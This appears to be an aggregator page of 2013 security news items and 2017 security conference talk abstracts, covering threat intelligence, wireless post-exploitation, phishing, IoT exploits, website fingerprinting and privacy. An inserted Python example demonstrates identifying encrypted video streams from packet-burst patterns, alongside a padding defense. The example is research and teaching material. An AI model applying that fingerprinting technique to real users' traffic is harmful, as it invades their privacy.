While many security experts have been pointing the blame at China for the recent wave of cyberattacks on U.S. companies and newspapers, Bloomberg reports that some of the malware attacks actually may be coming from Eastern Europe. Investigators familiar with the matter told Bloomberg they believe a cybercriminal group based in either Russia or Eastern Europe is carrying out the high-level attacks to steal company secrets, research, and intellectual property, which could then be sold on the black market. Evidence that the attacks may be coming from Eastern Europe is the type of malware being used by the hackers, which is more commonly used by cybercriminals than by government spying. Also, investigators have tracked at least one server being used by the hackers to a Ukrainian hosting company.

[News] Firefox 19 Fixes HTTPS Phishing Issue, Adds Built-In PDF Viewer

Mozilla has released Firefox 19, the latest version of its flagship browser, which includes not only fixes for a number of serious security vulnerabilities but also a built-in PDF viewer. The native PDF viewer in Firefox could help protect against some of the ongoing attacks that use vulnerabilities in Adobe Reader and other PDF readers as infection vectors. Attackers have been preying on Reader and Acrobat vulnerabilities for several years now, although the sandbox that Adobe added to Reader X and later versions has helped protect users against many exploits. Just last week, though, the first confirmed Reader sandbox escape exploit surfaced. Adobe patched that vulnerability on Tuesday. Mozilla officials said the inclusion of the built-in PDF viewer should make life a little easier for Firefox users when they encounter a PDF on a site.

[News] Apple patches the Java hole its own developers fell into – eventually

Shortly after admitting that its own techies got infected thanks to a Java hole, Apple has pushed out a Java update for the rest of us. Bit of a pity that the Fruity Ones didn't do this back at the beginning of February, when Oracle's emergency "pre-Patch-Tuesday" update came out to fix the hole that Apple is only now closing off. Apple therefore bumps its Java distribution from 1.6.0_37 to 1.6.0_41, leapfrogging OS X 10.7 and 10.8 users past 1.6.0_39 entirely (the even numbers weren't used for official releases). This re-aligns Apple's version with Oracle's own recent patch, which came out on 19 February 2013 as scheduled.

[News] Biometric USB password key worthy of ‘Mission: Impossible’

I hate to use the term "sexy" to describe a gadget, but if the myIDkey isn't "sexy," at least it's "damn fine." It takes the concept of a USB drive that protects all your passwords and does it up right with voice-activated search, biometric fingerprint identification, and Bluetooth. Making a USB password protection device sound exciting? That's pretty hot. I'm not the only person who thinks myIDkey is worth a look. It just launched its Kickstarter project and already has pulled in more than $87,000 (and rising fast) toward its $150,000 goal. A $99 pledge gets you a myIDkey with two different protective sleeves. Like most other USB password keys, you can plug myIDkey into a computer and it will auto-complete your information into pertinent forms. You can also store documents and files on it like a regular USB drive. What's cooler, though, is the voice-search function. Say the name of your bank, for example, and the key will show the information on an OLED display. Not just anyone can talk to the key and get results, though. You first have to unlock it by swiping your finger.

[News] Why encryption doesn’t solve the data sovereignty debate

There is a long-standing argument that encrypting all data sent to the cloud could make the data sovereignty debate irrelevant, enabling Australian companies to make use of cheaper, offshore clouds. The basis of the argument is that data, once encrypted, is random and cannot be read, so the problem is shifted toward the issue of key management — which can be solved by ensuring that keys remain onshore. But security vendors Trend Micro and Sophos, and systems integrator CSC, have argued that encrypting everything isn't necessarily the answer for everyone, and that doing so would come at too high a cost. At a media briefing, Trend Micro vice president for Data Centre and Cloud Security Bill McGee stated that encryption brings about additional challenges that have flow-on effects in terms of scaling a cloud solution, and the financial implications that brings.

[News] McAfee finds sophisticated attacks targeting other ‘critical sectors’ of the economy

Financial services has been a favorite target for sophisticated attacks in the last few years, but cyber criminals are moving on to other "critical sectors of the economy," according to McAfee. In the security giant's fourth quarter threats report, researchers highlighted some of the new schemes being used in this regard and other high-profile attacks, including advanced persistent threats (APTs) such as Operation High Roller and Project Blitzkrieg. Both of these methods attack financial services infrastructures, with the former aimed at manufacturing and import/export firms in the United States and Latin America, while Blitzkrieg hits both consumers and their banks through illicit electronic fund transfers. Vincent Weafer, senior vice president of McAfee Labs, explained in the report why many of these cyber criminals are becoming more interested in government, manufacturing and commercial transaction infrastructure targets.

GrrCon 2017 – Threat Intelligence: Zero to Basics in presentation

This is an audience participation talk on going from having DFIR with no Threat Intelligence to building a basic threat intelligence program. The majority of the data needed to start a Threat Intelligence program is probably already being captured by the DFIR program, and this talk is about taking that data, putting context around it to make it information, and then turning that into something actionable (intelligence). Attendees of this talk should be able to go back to the office after the conference and enhance their IR programs with Threat Intelligence. The presentation will show what Threat Intelligence is and how to collect the data from their own networks. The talk will cover why the majority of Threat Intelligence shouldn't be paid for until later in the program, while discussing the few things that should be paid for at the start. In parts of the talk attendees will help pick the data points to capture, and work through the Alternative Competing Hypotheses to figure out the most likely reason for the event / incident. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Learning from InfoSec Fails

This presentation will highlight some of the reasons why InfoSec either fails or is perceived to fail. People, Process, and Technology issues will be presented with examples. The goal of this talk is to allow people to pick up some pointers for doing things better by analyzing real world failures. This talk makes use of jaded and cynical humor to get some of the lessons learned across. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – A Reporter’s Look at Open Source Intelligence

Governmental and private agencies provide a vast amount of publicly-available information on individuals and companies for those driven or savvy enough to find it. This talk aims to ease the digital and bureaucratic guesswork from the perspective of an investigative reporter. We'll go through where and how to find certain types of data, and talk search tips to make the best of any future digital intelligence-gathering efforts. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Hidden Treasure: Detecting Intrusions with ETW

Today, defenders consume the Windows Event Log to detect intrusions. While useful, audit logs don't capture the full range of data needed for detection and response. ETW (Event Tracing for Windows) is an additional source of events that defenders can leverage to make post-breach activity more visible in Windows. ETW provides a rich set of data, largely intended for debugging scenarios. As a side effect, these traces also have data that is ideal for detecting potentially malicious behavior, such as raw networking data and detailed PowerShell data. Unfortunately, the ETW API is low level and primitive, making it difficult to use at scale reliably. Because our security team in Office 365 supports monitoring over 150,000 machines, we needed a reliable way to consume the events in real-time, while adhering to strict memory and CPU usage constraints. To accomplish this, our team built the open-source krabsetw library to simplify dynamically consuming ETW events. We currently use this library to collect 6.5TB of data per day from our service. In this talk, we'll discuss a few ETW sources we've found to be high value as well as the detections they enable. We'll also demo a few examples of using krabsetw to consume them as well as share some strategies for scaling ETW monitoring. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – The Black Art of Wireless Post-Exploitation

Wireless is an inherently insecure medium. Most companies recognize this, and focus their resources on minimizing the impact of wireless breaches rather than preventing them outright. During red team engagements, the wireless perimeter is cracked within the opening days of the assessment, or it isn't cracked at all. From an attacker's perspective, the real challenge lies in moving laterally out of the isolated sandbox in which network administrators typically place their wireless networks. Enterprise network teams are typically aware of this fact, and many will attempt to justify weak wireless perimeter security by pointing out how difficult it is to pivot from the WLAN into production. However, preventing an attacker from doing so is only easy when the network in question is used exclusively for basic functions such as providing Internet connectivity to employees. When wireless networks are used to provide access to sensitive internal infrastructure, the issue of access control gets significantly messier. A door must be provided through which authorized entities can freely traverse. As with cryptographic backdoors, a door that requires a key is a door no less. In this presentation, we will focus on methods through which red team operators can extend their reach further into the network after gaining their initial wireless foothold. We'll begin with a quick recap on how to use rogue access point attacks to breach all but the most secure implementations of WPA2-EAP. We'll then demonstrate methods of evading the most commonly used methods of WLAN access control, and explore whether segmentation of a wireless network is truly possible. Finally, we will demonstrate how contemporary network attacks can be combined with wireless man-in-the-middle techniques to create brutal killchains that would be impossible to achieve over a wired medium. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

GrrCon 2017 – Change is Simply an Act of Survival: Predicting the future while shackled to the past

This presentation will briefly review the history and development of the corporate network, its interaction with the Internet, and how the adoption of SaaS and PaaS based solutions has rendered the network irrelevant from a security perspective. We will explore recent developments in malware, trends in targets and attack methodologies using case studies. Finally we will consider one possible future and explore how laying the groundwork now will provide a more secure base to work from, while improving usability for the Netizens and reining in costs. For More Information Please Visit:- http://www.grrcon.com/ http://www.irongeek.com/i.php?page=videos/grrcon2017/mainlist

The Tool Box | QRLJacking

Today's episode of The Tool Box features QRLJacking. We break down everything you need to know, including what it does, who developed it, and the best ways to use it. Check out QRLJacking here: Github - https://github.com/OWASP/QRLJacking Website - https://www.owasp.org/index.php/Qrljacking

Circle City Con 2017 – Application Security Metrics

What's your current level of confidence in your application security program? Are you tracking any pen test metrics? Maybe you should. This session will detail several application security metrics used to measure the effectiveness of penetration testing at both program and engagement levels. The presenter will also share real world data from ~ 100 individual pen test engagements performed in 2016. Caroline Wong is the Vice President of Security Strategy at Cobalt. Cobalt delivers crowdsourced pen tests and private bug bounties to modern organizations. Caroline's close and practical information security knowledge stems from broad experience as a Cigital consultant, a Symantec product manager, and day-to-day leadership roles at eBay and Zynga. She is a well known thought leader on the topic of security metrics and has been featured at industry conferences including RSA (USA and Europe), IT Web Summit (South Africa), OWASP AppSec, Metricon, the Executive Women's Forum, ISC2, and the Information Security Forum. Caroline received a 2010 Women of Influence Award in the One to Watch category and authored the popular textbook Security Metrics: A Beginner's Guide, published by McGraw-Hill in 2011. She graduated from U.C. Berkeley with a B.S. in Electrical Engineering and Computer Sciences. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Of Flags, Frogs and 4chan: OPSec vs. Weaponized Autism

This talk will tell the stories of people who got their data leaked, or were trolled hard by 4chan because of bad OPSEC, and what they could have done better. Internet Hate Machine: because none of us is as cruel as all of us. ShowMeCon version, because I accidentally muted the mic. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – The State of Security in the Medical Industry

Bringing awareness to the pain felt in the healthcare industry from a security standpoint, what attackers are targeting, and how the industry needs to steer itself to prevent further patient risk and mishandling of data. @cannibal has spent 10 years working in the medical device community. While spending the majority of the time handling defensive security, he recently switched to the attack side after joining the Phobos Group in 2016. The handle "cannibal" comes from dis For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Open Sesamee

Resettable combination locks are popular because they can be set to user-chosen codes. Multiple locks can be set alike to one another. Authorized users don't have to keep track of keys or other physical credentials. These locks are often used to control access to construction zones, infrastructure, and sensitive areas (such as utility equipment and cellular towers) across the country. The most popular of these locks is the Master 175. Methods of attacking this lock have been known for some time, however the descriptions and documentation were not readily available. The talk will discuss the best method for decoding this lock and examine the path I took to create my own cutaways and instructional models. In the end, this will hopefully give people some home-machining skills and also help them decode the lock well enough to teach others. Max Power has been working in IT as a jack of all trades but with a fascination for risk and what trust is actually based in. Four years ago he dove straight into Locksport: running the Boston TOOOL chapter, helping with the lockpick villages at major cons, and actively working in the community. When not at work or picking locks he can be found trying to load as much weight as possible onto the bar, training for powerlifting competitions, because nothing is more fun than not bending when the bar does. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – See beyond the veil: Automating malicious javascript deobfuscation

Exploit kits use JavaScript to direct victim browsers to hosted exploits. These scripts are highly obfuscated to mask their intent and make analysis more difficult. Deobfuscating them manually is time consuming and does not scale. This talk will discuss techniques to automate JavaScript analysis. Chad Robertson is the Manager of Threat Analysis at Fidelis Cybersecurity. He has worked in incident response, security engineering, and the forensics field for over 10 years in a variety of roles. He has a Bachelor of Science from Purdue University. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Changing our future with 3D Printing

3D Printing represents the last tool that will be necessary in shifting into our new 21st century economy, as we finally break ourselves free from the shackles of the wealth inequality generated during the first three and a half industrial revolutions and the general perversion of economic sensibilities. We will transform our own perceptions of what the world is to become as we grow into the second half of the third industrial revolution, and blossom into the totality of the fourth and its wide adoption among society. This is also an important shift in dynamic within the economy as larger corporations turn to automation to lessen their overhead costs and improve profitability. For many of the individuals displaced through automation, we must strive to replace their positions within the economy, provide new growth opportunities, retrain or open the market to be more competitive towards small businesses, and re-empower communities to be self-sufficient. Our definition of prosperity and what we consider a healthy community, economy, environment, and investment system must be restructured. Emily is a writer for IFERS, or the Institute For Education, Research, and Scholarship, a 501(c)3 focused on providing high performing students opportunities for success and fostering associated tools. She spends her time studying high technologies and how they interact with aspects of society, economy, and our future. She has released a podcast that shows the behind-the-scenes research and brings cutting-edge topics to the forefront of American debate. She can be reached through knittinggothgirl.com, where more information can be found on writings, podcast materials, and the charity work being conducted. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – You’re not old enough for that: A TLS extension to put the past behind us

TLS evolves rapidly. We don't all have the luxury of upgrading with it, unfortunately; new versions, extensions, cipher suites, and protocols require mutual support. This poses a serious problem for those who have legacy systems that cannot be upgraded (think IoT, or any device that needs certification). Accepting the risk of using a weak (but still sufficient, or better than nothing) protocol with those systems on an interim basis shouldn't imply accepting the risk everywhere. I offer an alternative. I propose a TLS extension that endorses certificates with certain supported features, and then performs a sanity check at the end of establishment or renegotiation. This can be used to detect and prevent downgrade attacks, and doubles as a policy enforcement tool. Falcon is a Shadytel tactical lineman and a Leviathan security consultant. He usually talks about LangSec, and recently published "The Seven Turrets of Babel: A Taxonomy of LangSec Errors and How to Expunge Them". For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – We Don’t Always Go Lights and Sirens

One of the most critical steps to Incident Response is the initial triage phase. The same can be said of the decision Paramedics make when responding to emergency calls. During this presentation we will review how to properly triage an incident based on the information available while relating the process back to real life emergencies. Kendra (@4n6kendra) currently works at Duo Security as an Information Security Analyst. She holds a Bachelor of Science in Digital Forensics and has her CISSP. Throughout her five years working in Information Security, Kendra has had the pleasure of working in several areas including identity and access management, compliance, and a security operations center. Kendra is an advocate for practicing good security hygiene, and regularly conducts security awareness presentations for her community. In her free time, she enjoys watching The Golden Girls and connects the most with Sophia's character because of her lack of a verbal filter. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Ichthyology: Phishing as a Science

Many companies view phishing as a given: employees will click links and enter credentials, and we just need to be okay with that. Phishing prevention usually takes the form of training, and a warning to be careful when reading email. But does phishing training actually work? In this talk, we'll cover the psychology behind successful phishing campaigns, then walk through a series of attacks run against a Bay Area tech company. We'll cover how effective campaigns were built, including bypassing existing protections. Finally, we'll discuss evidence-based techniques to prevent, rather than just mitigate, credential phishing. Karla has a varied offensive security background: she's reverse engineered train ticketing systems, written articles on TLS and SSH, and competed in the Defcon CTF finals for the last several years running. She officially works on authentication and application security at Stripe, but builds internal phishing campaigns when she has business hours to spare. She's triggered many bouts of internal paranoia, and has built a reputation as being entirely untrustworthy when it comes to email. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Creating Your Own Customized Metamorphic Algorithm

Most malware uses metamorphic code to evade antivirus detection. These techniques also slow down security researchers when digging deeper into the malware code. On the malware side, there are many ways to generate and implement such algorithms, yet our ultimate goal is to detect them. I joined Fortinet in 2004, and am currently working as a Senior Security Researcher / AV Team Lead. I am also one of the Lead Trainers responsible for training the junior AV/IPS analysts in malware analysis and reverse engineering. I have presented at different conferences including BSidesVancouver, BSidesCapeBreton, OAS-First, BSidesOttawa, SecTor, DefCamp, BCAware, AtlSecCon, and BSidesCalgary. I am a regular contributor to the Fortinet blog and also to the Virus Bulletin publication, where I have published 22 articles. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

Circle City Con 2017 – Peakaboo – I own you: Owning hundreds of thousands of devices with a broken HTTP packet

Imagine that you've purchased a small, cheap IP security camera to feel just a little better about your own physical security. Now imagine that the people who designed that camera know nothing about secure programming, security, or programming at all. Imagine that your precious camera can be hijacked into a botnet with only one broken HTTP packet. Now stop imagining. At the end of 2016, my fellow researcher Yoav Orot and I published our research paper about hundreds of thousands of white-labeled IP security cameras being vulnerable to a simple attack that allows an attacker to gain complete control of the camera, including code execution as root, without any ability to patch. We did not publish any technical details yet since we had to wait for the vendor's answer. This talk will dive deeply into the product, our research process and into the vulnerabilities themselves. I will walk through all of the steps in our research (from hardware hacking to firmware dumping and just plain ol' reversing), demo the exploits, and explain, step by step, where the developers went wrong, what could have been done to avoid this situation and why this problem is so severe. There will be root shells, there will be exploits, there will be tears. Attendees of this talk will leave with some insights about IoT security and embedded device hacking. Amit leads the security research at Cybereason's Boston HQ. He specializes in low-level, vulnerability and kernel research, malware analysis and reverse engineering. He also has extensive experience researching attacks on large scale networks and investigating undocumented OS resources and APIs. Prior to joining Cybereason, Amit spent nine years leading security research projects and teams for the Israeli government, specifically in embedded system security. He's presented at RSA, BSides Tel Aviv and LayerOne. For More information Please Visit:- http://circlecitycon.com/ http://www.irongeek.com/i.php?page=videos/circlecitycon2017/mainlist

USENIX Security ’17 – “I Have No Idea What I’m Doing” – On the Usability of Deploying HTTPS

Katharina Krombholz, Wilfried Mayer, Martin Schmiedecker, and Edgar Weippl, SBA Research

Protecting communication content at scale is a difficult task, and TLS is the protocol most commonly used to do so. However, it has been shown that deploying it in a truly secure fashion is challenging for a large fraction of online service operators. While Let’s Encrypt was specifically built and launched to promote the adoption of HTTPS, this paper aims to understand the reasons why it has been so hard to deploy TLS correctly and studies the usability of the deployment process for HTTPS. We performed a series of experiments with 28 knowledgeable participants and revealed significant usability challenges that result in weak TLS configurations. Additionally, we conducted expert interviews with 7 experienced security auditors. Our results suggest that the deployment process is far too complex even for people with proficient knowledge in the field, and that server configurations should have stronger security by default. While the results from our expert interviews confirm the ecological validity of the lab study results, they additionally highlight that even educated users prefer solutions that are easy to use. An improved and less vulnerable workflow would be very beneficial to finding stronger configurations in the wild. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Beauty and the Burst: Remote Identification of Encrypted Video Streams

Roei Schuster, Tel Aviv University, Cornell Tech; Vitaly Shmatikov, Cornell Tech; Eran Tromer, Tel Aviv University, Columbia University

The MPEG-DASH streaming video standard contains an information leak: even if the stream is encrypted, the segmentation prescribed by the standard causes content-dependent packet bursts. We show that many video streams are uniquely characterized by their burst patterns, and classifiers based on convolutional neural networks can accurately identify these patterns given very coarse network measurements. We demonstrate that this attack can be performed even by a Web attacker who does not directly observe the stream, e.g., a JavaScript ad confined in a Web browser on a nearby machine. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Walkie-Talkie: An Efficient Defense Against Passive Website Fingerprinting Attacks

Tao Wang, Hong Kong University of Science and Technology; Ian Goldberg, University of Waterloo

Website fingerprinting (WF) is a traffic analysis attack that allows an eavesdropper to determine the web activity of a client, even if the client is using privacy technologies such as proxies, VPNs, or Tor. Recent work has highlighted the threat of website fingerprinting to privacy-sensitive web users. Many previously designed defenses against website fingerprinting have been broken by newer attacks that use better classifiers. The remaining effective defenses are inefficient: they hamper user experience and burden the server with large overheads. In this work we propose Walkie-Talkie, an effective and efficient WF defense. Walkie-Talkie modifies the browser to communicate in half-duplex mode rather than the usual full-duplex mode; half-duplex mode produces easily moldable burst sequences to leak less information to the adversary, at little additional overhead. Designed for the open-world scenario, Walkie-Talkie molds burst sequences so that sensitive and non-sensitive pages look the same. Experimentally, we show that Walkie-Talkie can defeat all known WF attacks with a bandwidth overhead of 31% and a time overhead of 34%, which is far more efficient than all effective WF defenses (often exceeding 100% for both types of overhead). In fact, we show that Walkie-Talkie cannot be defeated by any website fingerprinting attack, even hypothetical advanced attacks that use site link information, page visit rates, and intercell timing. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17
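Both abstracts above (the MPEG-DASH identification attack and the Walkie-Talkie defense) turn on the same coarse feature: the sequence of packet bursts, which survives encryption because only direction and size are used. The following Python example is added here and is not code from either paper. It extracts burst sequences from two constructed packet traces (invented sizes, not measurements), identifies a stream against a hypothetical fingerprint table by nearest burst pattern, and then molds the two incoming-burst sequences to a common supersequence in the Walkie-Talkie manner so that both pages emit identical bursts, reporting the padding overhead. The L1 nearest-fingerprint matcher stands in for the paper's CNN classifier; the leak it exploits is the same.

```python
# Added example (not from either paper): burst-sequence extraction,
# nearest-fingerprint identification and Walkie-Talkie style "molding".

# Constructed traces: (time_s, direction, bytes). direction +1 = server->client,
# -1 = client->server. Sizes are invented for illustration, not measurements.
TRACE_A = [(0.00, -1, 100), (0.05, 1, 1400), (0.06, 1, 1400), (0.07, 1, 200),
           (0.50, -1, 80), (0.55, 1, 3000)]
TRACE_B = [(0.00, -1, 100), (0.05, 1, 500),
           (0.50, -1, 80), (0.55, 1, 5000), (0.56, 1, 600)]

# Hypothetical fingerprint table: incoming burst sizes previously recorded for
# each known stream (constructed values).
FINGERPRINTS = {"video_a": [3000, 3000], "video_b": [500, 5600]}


def burst_sequence(packets):
    """Collapse consecutive same-direction packets into (direction, bytes) bursts."""
    bursts = []
    for _, direction, size in packets:
        if bursts and bursts[-1][0] == direction:
            bursts[-1] = (direction, bursts[-1][1] + size)
        else:
            bursts.append((direction, size))
    return bursts


def incoming_bursts(packets):
    """Server-to-client burst sizes only (for DASH, roughly one per segment)."""
    return [size for direction, size in burst_sequence(packets) if direction == 1]


def identify(observed, fingerprints):
    """Nearest fingerprint by L1 distance over zero-padded burst sizes.

    Returns None on a tie, i.e. when the observation cannot separate candidates.
    A trained CNN (as in the paper) would replace this distance function.
    """
    def distance(fp):
        n = max(len(fp), len(observed))
        a = observed + [0] * (n - len(observed))
        b = fp + [0] * (n - len(fp))
        return sum(abs(x - y) for x, y in zip(a, b))

    scored = sorted((distance(fp), name) for name, fp in fingerprints.items())
    if len(scored) > 1 and scored[0][0] == scored[1][0]:
        return None
    return scored[0][1]


def mold(a, b):
    """Walkie-Talkie molding: pad two burst sequences to their element-wise
    maximum (a common supersequence), so both pages send the same bursts."""
    n = max(len(a), len(b))
    pa = a + [0] * (n - len(a))
    pb = b + [0] * (n - len(b))
    return [max(x, y) for x, y in zip(pa, pb)]


def overhead(original, molded):
    """Padding bytes added, as a fraction of the real bytes."""
    return (sum(molded) - sum(original)) / sum(original)


if __name__ == "__main__":
    obs_a = incoming_bursts(TRACE_A)
    obs_b = incoming_bursts(TRACE_B)
    print("trace A identified as", identify(obs_a, FINGERPRINTS))
    molded = mold(obs_a, obs_b)
    print("after molding both pages send", molded,
          "overhead A=%.2f B=%.2f" % (overhead(obs_a, molded), overhead(obs_b, molded)))
```

Molding is symmetric, so once both pages are padded to the supersequence an observer sees one burst pattern for both; the cost is the overhead figure, which is what the paper's 31% bandwidth number measures over real page sets.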

USENIX Security ’17 – A Privacy Analysis of Cross-device Tracking

Sebastian Zimmeck, Carnegie Mellon University; Jie S. Li and Hyungtae Kim, unaffiliated; Steven M. Bellovin and Tony Jebara, Columbia University

Online tracking is evolving from browser- and device-tracking to people-tracking. As users are increasingly accessing the Internet from multiple devices this new paradigm of tracking—in most cases for purposes of advertising—is aimed at crossing the boundary between a user’s individual devices and browsers. It establishes a person-centric view of a user across devices and seeks to combine the input from various data sources into an individual and comprehensive user profile. By its very nature such cross-device tracking can principally reveal a complete picture of a person and, thus, become more privacy-invasive than the siloed tracking via HTTP cookies or other traditional and more limited tracking mechanisms. In this study we are exploring cross-device tracking techniques as well as their privacy implications. Particularly, we demonstrate a method to detect the occurrence of cross-device tracking, and, based on a cross-device tracking dataset that we collected from 126 Internet users, we explore the prevalence of cross-device trackers on mobile and desktop devices. We show that the similarity of IP addresses and Internet history for a user’s devices gives rise to a matching rate of F-1 = 0.91 for connecting a mobile to a desktop device in our dataset. This finding is especially noteworthy in light of the increase in learning power that cross-device companies may achieve by leveraging user data from more than one device. Given these privacy implications of cross-device tracking we also examine compliance with applicable self-regulation for 40 cross-device companies and find that some are not transparent about their practices. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – SmartPool: Practical Decentralized Pooled Mining

Loi Luu, National University of Singapore; Yaron Velner, The Hebrew University of Jerusalem; Jason Teutsch, TrueBit Foundation; Prateek Saxena, National University of Singapore

Cryptocurrencies such as Bitcoin and Ethereum are operated by a handful of mining pools. Nearly 95% of Bitcoin’s and 80% of Ethereum’s mining power resides with less than ten and six mining pools respectively. Although miners benefit from low payout variance in pooled mining, centralized mining pools require members to trust that pool operators will remunerate them fairly. Furthermore, centralized pools pose the risk of transaction censorship from pool operators, and open up possibilities for collusion between pools for perpetrating severe attacks. In this work, we propose SMARTPOOL, a novel protocol design for a decentralized mining pool. Our protocol shows how one can leverage smart contracts, autonomous blockchain programs, to decentralize cryptocurrency mining. SMARTPOOL gives transaction selection control back to miners while yielding low-variance payouts. SMARTPOOL incurs mining fees lower than centralized mining pools and is designed to scale to a large number of miners. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – REM: Resource-Efficient Mining for Blockchains

Fan Zhang, Ittay Eyal, and Robert Escriva, Cornell University; Ari Juels, Cornell Tech; Robbert van Renesse, Cornell University

Blockchains show promise as potential infrastructure for financial transaction systems. The security of blockchains today, however, relies critically on Proof-of-Work (PoW), which forces participants to waste computational resources. We present REM (Resource-Efficient Mining), a new blockchain mining framework that uses trusted hardware (Intel SGX). REM achieves security guarantees similar to PoW, but leverages the partially decentralized trust model inherent in SGX to achieve a fraction of the waste of PoW. Its key idea, Proof-of-Useful-Work (PoUW), involves miners providing trustworthy reporting on CPU cycles they devote to inherently useful workloads. REM flexibly allows any entity to create a useful workload. REM ensures the trustworthiness of these workloads by means of a novel scheme of hierarchical attestations that may be of independent interest. To address the risk of compromised SGX CPUs, we develop a statistics-based formal security framework, also relevant to other trusted-hardware-based approaches such as Intel’s Proof of Elapsed Time (PoET). We show through economic analysis that REM achieves less waste than PoET and variant schemes. We implement REM and, as an example application, swap it into the consensus layer of Bitcoin core. The result is the first full implementation of an SGX-based blockchain. We experiment with four example applications as useful workloads for our implementation of REM, and report a computational overhead of 5—15%. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Ensuring Authorized Updates in Multi-user Database-Backed Applications

Kevin Eykholt, Atul Prakash, and Barzan Mozafari, University of Michigan Ann Arbor

Database-backed applications rely on access control policies based on views to protect sensitive data from unauthorized parties. Current techniques assume that the application’s database tables contain a column that enables mapping a user to rows in the table. This assumption allows database views or similar mechanisms to enforce per-user access controls. However, not all database tables contain sufficient information to map a user to rows in the table, as a result of database normalization, and thus, require the joining of multiple tables. In a survey of 10 popular open-source web applications, on average, 21% of the database tables require a join. This means that current techniques cannot enforce security policies on all update queries for these applications, due to a well-known view update problem. In this paper, we propose phantom extraction, a technique, which enforces per user access control policies on all database update queries. Phantom extraction does not make the same assumptions as previous work, and, more importantly, does not use database views as a core enforcement mechanism. Therefore, it does not fall victim to the view update problem. We have created SafeD as a practical access control solution, which uses our phantom extraction technique. SafeD uses a declarative language for defining security policies, while retaining the simplicity of database views. We evaluated our system on two popular databases for open source web applications, MySQL and Postgres. On MySQL, which has no built-in access control, we observe a 6% increase in transaction latency. On Postgres, SafeD outperforms the built-in access control by an order of magnitude when security policies involved joins. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Qapla: Policy compliance for database-backed systems

Aastha Mehta and Eslam Elnikety, Max Planck Institute for Software Systems (MPI-SWS); Katura Harvey, University of Maryland, College Park and Max Planck Institute for Software Systems (MPI-SWS); Deepak Garg and Peter Druschel, Max Planck Institute for Software Systems (MPI-SWS)

Many database-backed systems store confidential data that is accessed on behalf of users with different privileges. Policies governing access are often fine-grained, being specific to users, time, accessed columns and rows, values in the database (e.g., user roles), and operators used in queries (e.g., aggregators, group by, and join). Today, applications are often relied upon to issue policy compliant queries or filter the results of non-compliant queries, which is vulnerable to application errors. Qapla provides an alternate approach to policy enforcement that neither depends on application correctness, nor on specialized database support. In Qapla, policies are specific to rows and columns and may additionally refer to the querier’s identity and time, are specified in SQL, and stored in the database itself. We prototype Qapla in a database adapter, and evaluate it by enforcing applicable policies in the HotCRP conference management system and a system for managing academic job applications. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

USENIX Security ’17 – Data Hemorrhage, Inequality, and You: How Technology and Data Flows are Changing the Civil Liberties Game

Shankar Narayan, Technology and Liberty Project Director, American Civil Liberties Union of Washington

Rapidly growing data flows and game-changing advances in aggregation, analytics, and machine learning are changing the game for all of our civil liberties. The public discourse around data often tends to focus on information security, but rarely is inequality at the core of the discussion. Yet we are in a new space where discretion and control over our basic civil liberties is being transferred to private entities from traditional government actors, making it more difficult to recognize threats to our civil liberties, much less respond to them. Our ability to use traditional statutory and constitutional protections is also rendered more challenging by the “tech-washing” of decisions through unaccountable algorithms. The result may be a world in which technology reinforces existing biases everywhere from education to criminal justice, creating a de facto two tier society. This talk will walk through the above dynamics using real-world examples such as police body cameras, advanced metering infrastructure, and other surveillance tools. It will also point to ways to create transparency and accountability around data flows. For More Information Please Visit:- https://www.usenix.org/conference/usenixsecurity17

DEF CON 25 – Artem Kondratenko – Cisco Catalyst Exploitation

